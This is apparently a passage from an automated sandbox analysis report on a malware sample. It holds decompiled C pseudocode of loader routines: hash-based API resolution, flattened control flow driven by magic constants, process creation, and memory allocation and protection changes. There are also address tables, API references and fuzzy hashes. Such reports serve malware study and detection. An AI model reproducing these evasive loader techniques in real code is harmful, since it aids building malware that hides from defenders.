                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E003E7080(_t21, 0x3ed8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x003e7120
                                                        0x003e7120
                                                        0x003e7120
                                                        0x003e7125
                                                        0x003e7125
                                                        0x003e7125
                                                        0x003e7125
                                                        0x003e712a
                                                        0x00000000
                                                        0x00000000
                                                        0x003e7130
                                                        0x003e723f
                                                        0x003e7246
                                                        0x003e7248
                                                        0x003e7260
                                                        0x003e7260
                                                        0x003e7266
                                                        0x003e7268
                                                        0x003e726e
                                                        0x003e7271
                                                        0x003e7276
                                                        0x003e7278
                                                        0x003e728b
                                                        0x003e7290
                                                        0x003e7290
                                                        0x003e7297
                                                        0x003e7299
                                                        0x003e729e
                                                        0x003e72a0
                                                        0x003e72b3
                                                        0x003e72b8
                                                        0x003e72b8
                                                        0x003e72c5
                                                        0x003e7136
                                                        0x003e7136
                                                        0x003e713b
                                                        0x003e7190
                                                        0x003e7195
                                                        0x00000000
                                                        0x003e719b
                                                        0x003e71a5
                                                        0x003e71aa
                                                        0x00000000
                                                        0x003e71aa
                                                        0x003e713d
                                                        0x003e713d
                                                        0x003e7184
                                                        0x003e7189
                                                        0x00000000
                                                        0x003e713f
                                                        0x003e7144
                                                        0x003e716e
                                                        0x003e7173
                                                        0x00000000
                                                        0x003e7146
                                                        0x003e7146
                                                        0x003e714b
                                                        0x00000000
                                                        0x003e7151
                                                        0x003e7158
                                                        0x003e715d
                                                        0x00000000
                                                        0x003e715d
                                                        0x003e714b
                                                        0x003e7144
                                                        0x003e713d
                                                        0x003e713b
                                                        0x00000000
                                                        0x003e7130
                                                        0x003e71b4
                                                        0x003e71b9
                                                        0x003e7207
                                                        0x003e720c
                                                        0x00000000
                                                        0x003e720e
                                                        0x003e7218
                                                        0x003e721d
                                                        0x00000000
                                                        0x003e721d
                                                        0x003e71bb
                                                        0x003e71bb
                                                        0x003e71f8
                                                        0x003e71fd
                                                        0x00000000
                                                        0x003e71bd
                                                        0x003e71bd
                                                        0x003e71c2
                                                        0x003e71df
                                                        0x003e71e4
                                                        0x00000000
                                                        0x003e71c4
                                                        0x003e71c4
                                                        0x003e71c9
                                                        0x00000000
                                                        0x003e71cb
                                                        0x003e71cb
                                                        0x00000000
                                                        0x003e71cb
                                                        0x003e71c9
                                                        0x003e71c2
                                                        0x003e71bb
                                                        0x00000000
                                                        0x003e7227
                                                        0x003e7227
                                                        0x003e7227
                                                        0x003e7232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E68AC), ref: 003E7266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9
                                                        • API String ID: 1029625771-121480178
                                                        • Opcode ID: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                        • Instruction ID: a5572c6cf956113bafca362649161f575d7887ecc046480ed099a9fd2f4bd7b1
                                                        • Opcode Fuzzy Hash: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                        • Instruction Fuzzy Hash: 3E31B42170C2F443EE276BBB68D537E11AA97A0304F214766F151CF7D5ED26CE026792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 415 3e4b70-3e4b80 416 3e4b9d-3e4bba 415->416 417 3e4b82-3e4b98 call 3e3f00 call 3e3e60 415->417 421 3e4bbc-3e4bd2 call 3e3f00 call 3e3e60 416->421 422 3e4bd7-3e4bf5 CreateProcessW 416->422 417->416 421->422 426 3e4bf7-3e4bfd 422->426 427 3e4c73-3e4c7a 422->427 429 3e4bff-3e4c13 426->429 430 3e4c14-3e4c1b 426->430 432 3e4c1d-3e4c33 call 3e3f00 call 3e3e60 430->432 433 3e4c38-3e4c45 430->433 432->433 439 3e4c47-3e4c5d call 3e3f00 call 3e3e60 433->439 440 3e4c62-3e4c72 433->440 439->440
                                                        C-Code - Quality: 60%
                                                        			E003E4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x3eddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003E3E60(__ebx, E003E3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x3eddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x3ee21c == 0) {
                                                        					 *0x3ee21c = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x3ede3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3ede3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x3ede3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3ede3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x003e4b70
                                                        0x003e4b70
                                                        0x003e4b70
                                                        0x003e4b79
                                                        0x003e4b7c
                                                        0x003e4b80
                                                        0x003e4b93
                                                        0x003e4b98
                                                        0x003e4b98
                                                        0x003e4ba6
                                                        0x003e4bb0
                                                        0x003e4bba
                                                        0x003e4bd2
                                                        0x003e4bd2
                                                        0x003e4bf1
                                                        0x003e4bf5
                                                        0x003e4c7a
                                                        0x003e4bf7
                                                        0x003e4bfd
                                                        0x003e4c14
                                                        0x003e4c1b
                                                        0x003e4c2e
                                                        0x003e4c33
                                                        0x003e4c33
                                                        0x003e4c3c
                                                        0x003e4c3e
                                                        0x003e4c45
                                                        0x003e4c58
                                                        0x003e4c5d
                                                        0x003e4c5d
                                                        0x003e4c66
                                                        0x003e4c72
                                                        0x003e4bff
                                                        0x003e4bff
                                                        0x003e4c05
                                                        0x003e4c13
                                                        0x003e4c13
                                                        0x003e4bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003E4BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                        • Instruction ID: ca1ee35ab55143b4282b9bd607de2bd9cfaaff2e96d1eec5feb6406f363d1a85
                                                        • Opcode Fuzzy Hash: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                        • Instruction Fuzzy Hash: B121D6317003A55BD726AB7BCC857BB37AAABD4700F10462CB554CF2D0FA70D9058751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 529 3e30a0-3e30b6 530 3e30ba-3e30bf 529->530 531 3e30c0-3e30c5 530->531 532 3e30cb 531->532 533 3e3201-3e3206 531->533 534 3e31ed-3e31f1 532->534 535 3e30d1-3e30d6 532->535 536 3e3208-3e320d 533->536 537 3e3245-3e324c 533->537 540 3e32f6-3e3300 534->540 541 3e31f7-3e31fc 534->541 542 3e30dc-3e30e1 535->542 543 3e31da-3e31e8 535->543 544 3e32ab-3e32b3 536->544 545 3e3213-3e3218 536->545 538 3e324e-3e3264 call 3e3f00 call 3e3e60 537->538 539 3e3269-3e3274 537->539 538->539 564 3e3276-3e328c call 3e3f00 call 3e3e60 539->564 565 3e3291-3e329f RtlAllocateHeap 539->565 541->531 549 3e30e7-3e30ec 542->549 550 3e31a0-3e31a8 542->550 543->531 546 3e32b5-3e32cd call 3e3f00 call 3e3e60 544->546 547 3e32d3-3e32f3 544->547 551 3e322d-3e3232 545->551 552 3e321a-3e3228 call 3e3d00 545->552 546->547 547->540 549->551 557 3e30f2-3e319b 549->557 559 3e31aa-3e31c2 call 3e3f00 call 3e3e60 550->559 560 3e31c8-3e31d5 550->560 551->531 553 3e3238-3e3242 551->553 552->530 557->530 559->560 560->530 564->565 565->540 568 3e32a1-3e32a6 565->568 568->530
                                                        C-Code - Quality: 71%
                                                        			E003E30A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x3ee1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E003E3E60(_t93, E003E3F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x3ee1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x3ee494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x3ee494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x3edd18 == 0) {
                                                        								 *0x3edd18 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x3ee43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x3ee43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E003E3D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x003e30a2
                                                        0x003e30a6
                                                        0x003e30ac
                                                        0x003e30b1
                                                        0x003e30b6
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x003e30c0
                                                        0x003e30c0
                                                        0x003e30c0
                                                        0x003e30c0
                                                        0x003e30c5
                                                        0x00000000
                                                        0x00000000
                                                        0x003e30cb
                                                        0x003e31f1
                                                        0x003e32f9
                                                        0x003e3300
                                                        0x003e31f7
                                                        0x003e31f7
                                                        0x00000000
                                                        0x003e31f7
                                                        0x003e30d1
                                                        0x003e30d6
                                                        0x003e31e5
                                                        0x00000000
                                                        0x003e30dc
                                                        0x003e30e1
                                                        0x003e31a0
                                                        0x003e31a8
                                                        0x003e31c0
                                                        0x003e31c2
                                                        0x003e31c2
                                                        0x003e31ce
                                                        0x003e31d0
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x00000000
                                                        0x003e30ba
                                                        0x003e30e7
                                                        0x003e30ec
                                                        0x00000000
                                                        0x003e30f2
                                                        0x003e30f2
                                                        0x003e310d
                                                        0x003e3111
                                                        0x003e311f
                                                        0x003e3123
                                                        0x003e3130
                                                        0x003e3139
                                                        0x003e3147
                                                        0x003e314b
                                                        0x003e3153
                                                        0x003e315b
                                                        0x003e3175
                                                        0x003e317f
                                                        0x003e3187
                                                        0x003e318b
                                                        0x003e3193
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x00000000
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x003e30ec
                                                        0x003e30e1
                                                        0x003e30d6
                                                        0x00000000
                                                        0x003e30cb
                                                        0x003e3206
                                                        0x003e3245
                                                        0x003e324c
                                                        0x003e325f
                                                        0x003e3264
                                                        0x003e3264
                                                        0x003e326b
                                                        0x003e3274
                                                        0x003e328c
                                                        0x003e328c
                                                        0x003e3299
                                                        0x003e329b
                                                        0x003e329f
                                                        0x00000000
                                                        0x003e32a1
                                                        0x003e32a1
                                                        0x00000000
                                                        0x003e32a1
                                                        0x003e3208
                                                        0x003e320d
                                                        0x003e32ab
                                                        0x003e32b3
                                                        0x003e32cb
                                                        0x003e32cd
                                                        0x003e32cd
                                                        0x003e32e4
                                                        0x003e32e6
                                                        0x003e32ed
                                                        0x003e32f0
                                                        0x003e32f3
                                                        0x00000000
                                                        0x003e3213
                                                        0x003e3218
                                                        0x00000000
                                                        0x003e321a
                                                        0x003e3221
                                                        0x003e3223
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x00000000
                                                        0x003e30ba
                                                        0x003e30ba
                                                        0x003e3218
                                                        0x003e320d
                                                        0x00000000
                                                        0x003e322d
                                                        0x003e322d
                                                        0x003e3242
                                                        0x00000000
                                                        0x003e3242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003E3299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                        • Instruction ID: 9241e975706e61e07d63f286ef6c32bda042b43280528217a9b98689843478f0
                                                        • Opcode Fuzzy Hash: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                        • Instruction Fuzzy Hash: BA51D3717083A58BC719DF6EC48852A7BEAEBD4304F204A1EF451CB391DB31DE498B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 2d0580-2d05be call 2d0ed0 583 2d05c0-2d05cf 580->583 584 2d05d2-2d05da 580->584 585 2d06e7-2d06ef 584->585 586 2d05e0-2d05e3 584->586 586->585 587 2d05e9-2d05eb 586->587 587->585 589 2d05f1-2d05fc 587->589 589->585 590 2d0602-2d0607 589->590 591 2d060d-2d0629 call 2d1140 RtlMoveMemory 590->591 592 2d06d8-2d06e4 590->592 595 2d062b-2d0630 591->595 596 2d0654-2d0659 591->596 597 2d0643-2d0652 595->597 598 2d0632-2d0641 595->598 599 2d066c-2d0678 596->599 600 2d065b-2d066a 596->600 601 2d0679-2d0699 call 2d1140 597->601 598->601 599->601 600->601 601->585 604 2d069b-2d06a3 VirtualProtect 601->604 605 2d06a5-2d06a8 604->605 606 2d06c6-2d06d5 604->606 605->585 607 2d06aa-2d06ad 605->607 607->585 608 2d06af-2d06b1 607->608 608->591 609 2d06b7-2d06c3 608->609
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002D061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 002D069C
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 8aaf8d2fa3937d9e23b0f5cae5288957c577d909dd6339c28dede6955c996dd3
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 093156B367420657E3249A69DCC5BEBA3C8DBD1355F48483BF905C23A0D52EDC78C2A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 610 3e5ce0-3e5cec call 3e65e0 613 3e5cee-3e5d04 call 3e3f00 call 3e3e60 610->613 614 3e5d09-3e5d0d ExitProcess 610->614 613->614
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E003E65E0();
                                                        				if( *0x3eddb8 == 0) {
                                                        					 *0x3eddb8 = E003E3E60(_t5, E003E3F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x003e5ce0
                                                        0x003e5cec
                                                        0x003e5d04
                                                        0x003e5d04
                                                        0x003e5d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 003E5D0B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                        • Instruction ID: a208ded121661b617140d396e20823898fbdb6a8be73af8895fea1550c88e28f
                                                        • Opcode Fuzzy Hash: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                        • Instruction Fuzzy Hash: 29D0C9217442A446DA56ABB65C8A76B269B4FE0748F104219E011CF2D6EE208920A750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 2d0ad0-2d0b31 call 2d0ed0 622 2d0b47-2d0b4d 619->622 623 2d0b33-2d0b42 619->623 625 2d0b5f-2d0b7b 622->625 626 2d0b4f-2d0b54 622->626 624 2d0d40 623->624 628 2d0b7d-2d0b8e 625->628 629 2d0b90 625->629 626->625 630 2d0b96-2d0b9c 628->630 629->630 632 2d0bae-2d0bca 630->632 633 2d0b9e-2d0ba3 630->633 635 2d0bcc-2d0bd4 632->635 636 2d0bd7-2d0c21 VirtualAlloc 632->636 633->632 635->636 640 2d0d1a-2d0d24 636->640 641 2d0c27-2d0c2e 636->641 640->624 642 2d0c44-2d0c4b 641->642 643 2d0c30-2d0c3f 641->643 644 2d0c5d-2d0c79 642->644 645 2d0c4d-2d0c52 642->645 643->624 647 2d0c7b-2d0c83 644->647 648 2d0c86-2d0c8d 644->648 645->644 647->648 649 2d0c9f-2d0cbb 648->649 650 2d0c8f-2d0c94 648->650 652 2d0cbd-2d0cc5 649->652 653 2d0cc8-2d0cfa VirtualAlloc 649->653 650->649 652->653 656 2d0d02-2d0d07 653->656 656->640 657 2d0d09-2d0d18 656->657 657->624
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 002D0BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 3a871adc4765540a30521ef04c1f8330e79eb17a11b67b9af8aace36232de365
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 81511770650218ABDB209F54CE85FEAB7B8EF54701F004096FA08B72A0D7B89D85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E003E7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E003E34C0(__ecx);
                                                        				if( *0x3edd1c == 0) {
                                                        					 *0x3edd1c = E003E3E60(__ebx, E003E3F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x3ee548; // 0x607dd8
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x3ee494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x3ee494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x3edf30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x3edf30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x003e7080
                                                        0x003e7082
                                                        0x003e7089
                                                        0x003e7092
                                                        0x003e70aa
                                                        0x003e70aa
                                                        0x003e70b0
                                                        0x003e70b2
                                                        0x003e70b8
                                                        0x003e70bc
                                                        0x003e70c3
                                                        0x003e70d6
                                                        0x003e70db
                                                        0x003e70db
                                                        0x003e70e2
                                                        0x003e70e4
                                                        0x003e70eb
                                                        0x003e70fe
                                                        0x003e7103
                                                        0x003e7103
                                                        0x003e7110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E721D,003E68AC), ref: 003E70B0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
